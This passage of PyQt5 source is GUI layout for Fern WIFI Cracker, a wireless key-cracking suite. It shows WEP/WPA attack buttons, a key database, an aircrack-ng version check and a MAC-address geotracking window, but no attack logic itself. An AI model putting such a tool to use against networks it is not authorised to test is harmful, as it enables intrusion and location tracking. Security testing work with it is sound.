        self.verticalLayout_20.setObjectName(_fromUtf8("verticalLayout_20"))
        self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_5.setObjectName(_fromUtf8("horizontalLayout_5"))
        self.loading_label = QtWidgets.QLabel(Dialog)
        self.loading_label.setEnabled(True)
        self.loading_label.setText(_fromUtf8(""))
        self.loading_label.setPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/loading.gif"%(os.getcwd()))))
        self.loading_label.setObjectName(_fromUtf8("loading_label"))
        self.horizontalLayout_5.addWidget(self.loading_label)
        self.verticalLayout_9 = QtWidgets.QVBoxLayout()
        self.verticalLayout_9.setObjectName(_fromUtf8("verticalLayout_9"))
        spacerItem8 = QtWidgets.QSpacerItem(166, 3, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_9.addItem(spacerItem8)
        self.interface_combo = QtWidgets.QComboBox(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.interface_combo.sizePolicy().hasHeightForWidth())
        self.interface_combo.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.interface_combo.setFont(font)
        self.interface_combo.setObjectName(_fromUtf8("interface_combo"))
        self.verticalLayout_9.addWidget(self.interface_combo)
        self.horizontalLayout_5.addLayout(self.verticalLayout_9)
        spacerItem9 = QtWidgets.QSpacerItem(13, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem9)
        self.verticalLayout_18 = QtWidgets.QVBoxLayout()
        self.verticalLayout_18.setObjectName(_fromUtf8("verticalLayout_18"))
        spacerItem10 = QtWidgets.QSpacerItem(85, 3, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_18.addItem(spacerItem10)
        self.refresh_intfacebutton = QtWidgets.QPushButton(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.refresh_intfacebutton.sizePolicy().hasHeightForWidth())
        self.refresh_intfacebutton.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.refresh_intfacebutton.setFont(font)
        icon2 = QtGui.QIcon()
        icon2.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/PNG-Refresh.png-256x256.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.refresh_intfacebutton.setIcon(icon2)
        self.refresh_intfacebutton.setIconSize(QtCore.QSize(24, 23))
        self.refresh_intfacebutton.setObjectName(_fromUtf8("refresh_intfacebutton"))
        self.verticalLayout_18.addWidget(self.refresh_intfacebutton)
        self.horizontalLayout_5.addLayout(self.verticalLayout_18)
        spacerItem11 = QtWidgets.QSpacerItem(18, 20, QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_5.addItem(spacerItem11)
        spacerItem12 = QtWidgets.QSpacerItem(13, 36, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_5.addItem(spacerItem12)
        self.verticalLayout_20.addLayout(self.horizontalLayout_5)
        self.mon_label = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Minimum)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.mon_label.sizePolicy().hasHeightForWidth())
        self.mon_label.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.mon_label.setFont(font)
        self.mon_label.setObjectName(_fromUtf8("mon_label"))
        self.verticalLayout_20.addWidget(self.mon_label)
        self.verticalLayout_27.addLayout(self.verticalLayout_20)
        self.verticalLayout_19 = QtWidgets.QVBoxLayout()
        self.verticalLayout_19.setObjectName(_fromUtf8("verticalLayout_19"))
        self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        self.verticalLayout_8 = QtWidgets.QVBoxLayout()
        self.verticalLayout_8.setObjectName(_fromUtf8("verticalLayout_8"))
        spacerItem13 = QtWidgets.QSpacerItem(168, 2, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_8.addItem(spacerItem13)
        self.scan_button = QtWidgets.QPushButton(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.scan_button.sizePolicy().hasHeightForWidth())
        self.scan_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.scan_button.setFont(font)
        self.scan_button.setText(_fromUtf8(""))
        icon3 = QtGui.QIcon()
        icon3.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/radio-wireless-signal-icone-5919-128.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.scan_button.setIcon(icon3)
        self.scan_button.setIconSize(QtCore.QSize(40, 42))
        self.scan_button.setObjectName(_fromUtf8("scan_button"))
        self.verticalLayout_8.addWidget(self.scan_button)
        self.horizontalLayout_4.addLayout(self.verticalLayout_8)
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        spacerItem14 = QtWidgets.QSpacerItem(20, 0, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout.addItem(spacerItem14)
        spacerItem15 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem15)
        self.label_7 = QtWidgets.QLabel(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_7.sizePolicy().hasHeightForWidth())
        self.label_7.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label_7.setFont(font)
        self.label_7.setObjectName(_fromUtf8("label_7"))
        self.verticalLayout.addWidget(self.label_7)
        spacerItem16 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem16)
        self.horizontalLayout_4.addLayout(self.verticalLayout)
        self.verticalLayout_19.addLayout(self.horizontalLayout_4)
        self.horizontalLayout_8 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_8.setObjectName(_fromUtf8("horizontalLayout_8"))
        self.verticalLayout_10 = QtWidgets.QVBoxLayout()
        self.verticalLayout_10.setObjectName(_fromUtf8("verticalLayout_10"))
        spacerItem17 = QtWidgets.QSpacerItem(168, 2, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_10.addItem(spacerItem17)
        self.wep_button = QtWidgets.QPushButton(Dialog)
        self.wep_button.setEnabled(False)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.wep_button.sizePolicy().hasHeightForWidth())
        self.wep_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        font.setBold(True)
        font.setWeight(75)
        self.wep_button.setFont(font)
        icon4 = QtGui.QIcon()
        icon4.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/wifi_2.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.wep_button.setIcon(icon4)
        self.wep_button.setIconSize(QtCore.QSize(67, 62))
        self.wep_button.setObjectName(_fromUtf8("wep_button"))
        self.verticalLayout_10.addWidget(self.wep_button)
        self.horizontalLayout_8.addLayout(self.verticalLayout_10)
        self.verticalLayout_11 = QtWidgets.QVBoxLayout()
        self.verticalLayout_11.setObjectName(_fromUtf8("verticalLayout_11"))
        self.verticalLayout_2 = QtWidgets.QVBoxLayout()
        self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
        spacerItem18 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem18)
        self.wep_clientlabel = QtWidgets.QLabel(Dialog)
        self.wep_clientlabel.setEnabled(False)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.wep_clientlabel.setFont(font)
        self.wep_clientlabel.setObjectName(_fromUtf8("wep_clientlabel"))
        self.verticalLayout_2.addWidget(self.wep_clientlabel)
        spacerItem19 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_2.addItem(spacerItem19)
        self.verticalLayout_11.addLayout(self.verticalLayout_2)
        self.horizontalLayout_8.addLayout(self.verticalLayout_11)
        self.verticalLayout_19.addLayout(self.horizontalLayout_8)
        self.horizontalLayout_9 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_9.setObjectName(_fromUtf8("horizontalLayout_9"))
        self.verticalLayout_12 = QtWidgets.QVBoxLayout()
        self.verticalLayout_12.setObjectName(_fromUtf8("verticalLayout_12"))
        spacerItem20 = QtWidgets.QSpacerItem(168, 2, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_12.addItem(spacerItem20)
        self.wpa_button = QtWidgets.QPushButton(Dialog)
        self.wpa_button.setEnabled(False)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.wpa_button.sizePolicy().hasHeightForWidth())
        self.wpa_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        font.setBold(True)
        font.setWeight(75)
        self.wpa_button.setFont(font)
        icon5 = QtGui.QIcon()
        icon5.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/wifi_6.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.wpa_button.setIcon(icon5)
        self.wpa_button.setIconSize(QtCore.QSize(67, 62))
        self.wpa_button.setObjectName(_fromUtf8("wpa_button"))
        self.verticalLayout_12.addWidget(self.wpa_button)
        self.horizontalLayout_9.addLayout(self.verticalLayout_12)
        self.verticalLayout_13 = QtWidgets.QVBoxLayout()
        self.verticalLayout_13.setObjectName(_fromUtf8("verticalLayout_13"))
        self.verticalLayout_3 = QtWidgets.QVBoxLayout()
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
        spacerItem21 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_3.addItem(spacerItem21)
        self.wpa_clientlabel = QtWidgets.QLabel(Dialog)
        self.wpa_clientlabel.setEnabled(False)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.wpa_clientlabel.setFont(font)
        self.wpa_clientlabel.setObjectName(_fromUtf8("wpa_clientlabel"))
        self.verticalLayout_3.addWidget(self.wpa_clientlabel)
        spacerItem22 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_3.addItem(spacerItem22)
        self.verticalLayout_13.addLayout(self.verticalLayout_3)
        self.horizontalLayout_9.addLayout(self.verticalLayout_13)
        self.verticalLayout_19.addLayout(self.horizontalLayout_9)
        self.horizontalLayout_10 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_10.setObjectName(_fromUtf8("horizontalLayout_10"))
        self.verticalLayout_14 = QtWidgets.QVBoxLayout()
        self.verticalLayout_14.setObjectName(_fromUtf8("verticalLayout_14"))
        spacerItem23 = QtWidgets.QSpacerItem(168, 2, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_14.addItem(spacerItem23)
        self.database_button = QtWidgets.QPushButton(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.database_button.sizePolicy().hasHeightForWidth())
        self.database_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        font.setBold(True)
        font.setWeight(75)
        self.database_button.setFont(font)
        icon6 = QtGui.QIcon()
        icon6.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/Database-64.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.database_button.setIcon(icon6)
        self.database_button.setIconSize(QtCore.QSize(67, 62))
        self.database_button.setObjectName(_fromUtf8("database_button"))
        self.verticalLayout_14.addWidget(self.database_button)
        self.horizontalLayout_10.addLayout(self.verticalLayout_14)
        self.verticalLayout_15 = QtWidgets.QVBoxLayout()
        self.verticalLayout_15.setObjectName(_fromUtf8("verticalLayout_15"))
        self.verticalLayout_4 = QtWidgets.QVBoxLayout()
        self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
        spacerItem24 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_4.addItem(spacerItem24)
        self.label_16 = QtWidgets.QLabel(Dialog)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label_16.setFont(font)
        self.label_16.setObjectName(_fromUtf8("label_16"))
        self.verticalLayout_4.addWidget(self.label_16)
        spacerItem25 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_4.addItem(spacerItem25)
        self.verticalLayout_15.addLayout(self.verticalLayout_4)
        self.horizontalLayout_10.addLayout(self.verticalLayout_15)
        self.verticalLayout_19.addLayout(self.horizontalLayout_10)
        self.horizontalLayout_11 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_11.setObjectName(_fromUtf8("horizontalLayout_11"))
        self.verticalLayout_16 = QtWidgets.QVBoxLayout()
        self.verticalLayout_16.setObjectName(_fromUtf8("verticalLayout_16"))
        spacerItem26 = QtWidgets.QSpacerItem(168, 2, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.verticalLayout_16.addItem(spacerItem26)
        self.tool_button = QtWidgets.QPushButton(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.tool_button.sizePolicy().hasHeightForWidth())
        self.tool_button.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        font.setBold(True)
        font.setWeight(75)
        self.tool_button.setFont(font)
        icon7 = QtGui.QIcon()
        icon7.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/1295905972_tool_kit.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tool_button.setIcon(icon7)
        self.tool_button.setIconSize(QtCore.QSize(67, 62))
        self.tool_button.setObjectName(_fromUtf8("tool_button"))
        self.verticalLayout_16.addWidget(self.tool_button)
        self.horizontalLayout_11.addLayout(self.verticalLayout_16)
        self.verticalLayout_17 = QtWidgets.QVBoxLayout()
        self.verticalLayout_17.setObjectName(_fromUtf8("verticalLayout_17"))
        self.verticalLayout_5 = QtWidgets.QVBoxLayout()
        self.verticalLayout_5.setObjectName(_fromUtf8("verticalLayout_5"))
        spacerItem27 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_5.addItem(spacerItem27)
        self.label_13 = QtWidgets.QLabel(Dialog)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.label_13.setFont(font)
        self.label_13.setText(_fromUtf8(""))
        self.label_13.setObjectName(_fromUtf8("label_13"))
        self.verticalLayout_5.addWidget(self.label_13)
        spacerItem28 = QtWidgets.QSpacerItem(20, 18, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_5.addItem(spacerItem28)
        self.verticalLayout_17.addLayout(self.verticalLayout_5)
        self.horizontalLayout_11.addLayout(self.verticalLayout_17)
        self.verticalLayout_19.addLayout(self.horizontalLayout_11)
        self.verticalLayout_27.addLayout(self.verticalLayout_19)
        self.verticalLayout_25.addLayout(self.verticalLayout_27)
        self.horizontalLayout_7.addLayout(self.verticalLayout_25)
        self.verticalLayout_29.addLayout(self.horizontalLayout_7)
        self.groupBox = QtWidgets.QGroupBox(Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.groupBox.sizePolicy().hasHeightForWidth())
        self.groupBox.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.groupBox.setFont(font)
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.groupBox)
        self.verticalLayout_7.setObjectName(_fromUtf8("verticalLayout_7"))
        self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_13.setObjectName(_fromUtf8("horizontalLayout_13"))
        self.verticalLayout_6 = QtWidgets.QVBoxLayout()
        self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
        self.label_6 = QtWidgets.QLabel(self.groupBox)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_6.sizePolicy().hasHeightForWidth())
        self.label_6.setSizePolicy(sizePolicy)
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.verticalLayout_6.addWidget(self.label_6)
        self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_12.setObjectName(_fromUtf8("horizontalLayout_12"))
        self.label_90 = QtWidgets.QLabel(self.groupBox)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label_90.sizePolicy().hasHeightForWidth())
        self.label_90.setSizePolicy(sizePolicy)
        self.label_90.setObjectName(_fromUtf8("label_90"))
        self.horizontalLayout_12.addWidget(self.label_90)
        spacerItem29 = QtWidgets.QSpacerItem(0, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_12.addItem(spacerItem29)
        self.label = QtWidgets.QLabel(self.groupBox)
        self.label.setObjectName(_fromUtf8("label"))
        self.horizontalLayout_12.addWidget(self.label)
        self.verticalLayout_6.addLayout(self.horizontalLayout_12)
        self.horizontalLayout_13.addLayout(self.verticalLayout_6)
        spacerItem30 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_13.addItem(spacerItem30)
        self.verticalLayout_7.addLayout(self.horizontalLayout_13)
        self.verticalLayout_29.addWidget(self.groupBox)
        self.verticalLayout_30.addLayout(self.verticalLayout_29)

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)

    def retranslateUi(self, Dialog):
        pythonver = str(sys.version)
        display = str(subprocess.getstatusoutput('aircrack-ng'))
        Dialog.setWindowTitle(QtWidgets.QApplication.translate("Dialog", "Fern WIFI Cracker", None, 0))
        self.update_label.setText(QtWidgets.QApplication.translate("Dialog", "Latest update is installed:  Revision 10", None, 0))
        self.py_version_label.setText(QtWidgets.QApplication.translate("Dialog", "Python Version: <font color=green>%s</font>"%(pythonver[0:14].replace('(',(''))), None, 0))
        self.air_version.setText(QtWidgets.QApplication.translate("Dialog", "Aircrack Version: <font color=green>%s</font>"%(display[11:33]), None, 0))
        self.qt_version.setText(QtWidgets.QApplication.translate("Dialog", "Qt Version: <font color=green>%s</font>"%(QtCore.PYQT_VERSION_STR), None, 0))
        self.refresh_intfacebutton.setText(QtWidgets.QApplication.translate("Dialog", " Refresh", None, 0))
        self.mon_label.setText(QtWidgets.QApplication.translate("Dialog", "Monitor Mode enabled on wlan0", None, 0))
        self.label_7.setText(QtWidgets.QApplication.translate("Dialog", "Scan for Access points", None, 0))
        self.wep_button.setText(QtWidgets.QApplication.translate("Dialog", "WEP", None, 0))
        self.wep_clientlabel.setText(QtWidgets.QApplication.translate("Dialog", "Detection Status", None, 0))
        self.wpa_button.setText(QtWidgets.QApplication.translate("Dialog", "WPA", None, 0))
        self.wpa_clientlabel.setText(QtWidgets.QApplication.translate("Dialog", "Detection Status", None, 0))
        self.database_button.setText(QtWidgets.QApplication.translate("Dialog", "Key Database", None, 0))
        self.label_16.setText(QtWidgets.QApplication.translate("Dialog", "No Key Entries", None, 0))
        self.tool_button.setText(QtWidgets.QApplication.translate("Dialog", "ToolBox", None, 0))
        self.label_13.setText(QtWidgets.QApplication.translate("Dialog", "", None, 0))
        self.groupBox.setTitle(QtWidgets.QApplication.translate("Dialog", "About Fern WIFI Cracker", None, 0))
        self.label_6.setText(QtWidgets.QApplication.translate("Dialog", "GUI suite for wireless  encryption strength testing of 802.11 wireless encryption standard access points", None, 0))
        self.label_90.setText(QtWidgets.QApplication.translate("Dialog", "Written by Saviour Emmanuel Ekiko", None, 0))
        self.label.setText(QtWidgets.QApplication.translate("Dialog", " Report Bugs at :  savioboyz@rocketmail.com", None, 0))



import os
from gui.main_window import font_size
from PyQt5 import QtCore, QtWidgets, QtGui

font_setting = font_size()


try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    _fromUtf8 = lambda s: s

class Ui_fern_geotrack(object):
    def setupUi(self, fern_geotrack):
        fern_geotrack.setObjectName(_fromUtf8("fern_geotrack"))
        fern_geotrack.resize(823, 630)
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(_fromUtf8("%s/resources/map.png"%(os.getcwd()))), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        fern_geotrack.setWindowIcon(icon)
        self.verticalLayout_5 = QtWidgets.QVBoxLayout(fern_geotrack)
        self.verticalLayout_5.setObjectName(_fromUtf8("verticalLayout_5"))
        self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_6.setObjectName(_fromUtf8("horizontalLayout_6"))
        spacerItem = QtWidgets.QSpacerItem(207, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_6.addItem(spacerItem)
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
        spacerItem1 = QtWidgets.QSpacerItem(15, 28, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.horizontalLayout_2.addItem(spacerItem1)
        self.target_combo = QtWidgets.QComboBox(fern_geotrack)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Ignored)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.target_combo.sizePolicy().hasHeightForWidth())
        self.target_combo.setSizePolicy(sizePolicy)
        font = QtGui.QFont()
        font.setPointSize(8)
        self.target_combo.setFont(font)
        self.target_combo.setEditable(False)
        self.target_combo.setObjectName(_fromUtf8("target_combo"))
        self.horizontalLayout_2.addWidget(self.target_combo)
        self.horizontalLayout_6.addLayout(self.horizontalLayout_2)
        spacerItem2 = QtWidgets.QSpacerItem(248, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_6.addItem(spacerItem2)
        self.verticalLayout_5.addLayout(self.horizontalLayout_6)
        self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_4.setObjectName(_fromUtf8("horizontalLayout_4"))
        spacerItem3 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem3)
        self.database_radio = QtWidgets.QRadioButton(fern_geotrack)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.database_radio.setFont(font)
        self.database_radio.setChecked(True)
        self.database_radio.setObjectName(_fromUtf8("database_radio"))
        self.horizontalLayout_4.addWidget(self.database_radio)
        spacerItem4 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem4)
        self.insert_mac_radio = QtWidgets.QRadioButton(fern_geotrack)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.insert_mac_radio.setFont(font)
        self.insert_mac_radio.setChecked(False)
        self.insert_mac_radio.setObjectName(_fromUtf8("insert_mac_radio"))
        self.horizontalLayout_4.addWidget(self.insert_mac_radio)
        spacerItem5 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_4.addItem(spacerItem5)
        self.verticalLayout_5.addLayout(self.horizontalLayout_4)
        spacerItem6 = QtWidgets.QSpacerItem(20, 10, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
        self.verticalLayout_5.addItem(spacerItem6)
        self.map_viewer = QtWebKit.QWebView(fern_geotrack)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.map_viewer.setFont(font)
        self.map_viewer.setUrl(QtCore.QUrl(_fromUtf8("")))
        self.map_viewer.setObjectName(_fromUtf8("map_viewer"))
        self.verticalLayout_5.addWidget(self.map_viewer)
        self.groupBox = QtWidgets.QGroupBox(fern_geotrack)
        self.groupBox.setTitle(_fromUtf8(""))
        self.groupBox.setObjectName(_fromUtf8("groupBox"))
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        spacerItem7 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem7)
        self.verticalLayout = QtWidgets.QVBoxLayout()
        self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
        self.mac_address_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.mac_address_label.setFont(font)
        self.mac_address_label.setObjectName(_fromUtf8("mac_address_label"))
        self.verticalLayout.addWidget(self.mac_address_label)
        spacerItem8 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout.addItem(spacerItem8)
        self.country_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.country_label.setFont(font)
        self.country_label.setObjectName(_fromUtf8("country_label"))
        self.verticalLayout.addWidget(self.country_label)
        self.horizontalLayout.addLayout(self.verticalLayout)
        spacerItem9 = QtWidgets.QSpacerItem(29, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem9)
        self.verticalLayout_4 = QtWidgets.QVBoxLayout()
        self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
        self.latitude_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.latitude_label.setFont(font)
        self.latitude_label.setObjectName(_fromUtf8("latitude_label"))
        self.verticalLayout_4.addWidget(self.latitude_label)
        spacerItem10 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
        self.verticalLayout_4.addItem(spacerItem10)
        self.city_label = QtWidgets.QLabel(self.groupBox)
        font = QtGui.QFont()
        font.setPointSize(font_setting)
        self.city_label.setFont(font)
        self.city_label.setObjectName(_fromUtf8("city_label"))
        self.verticalLayout_4.addWidget(self.city_label)
        self.horizontalLayout.addLayout(self.verticalLayout_4)
        spacerItem11 = QtWidgets.QSpacerItem(28, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem11)
        self.verticalLayout_3 = QtWidgets.QVBoxLayout()
        self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
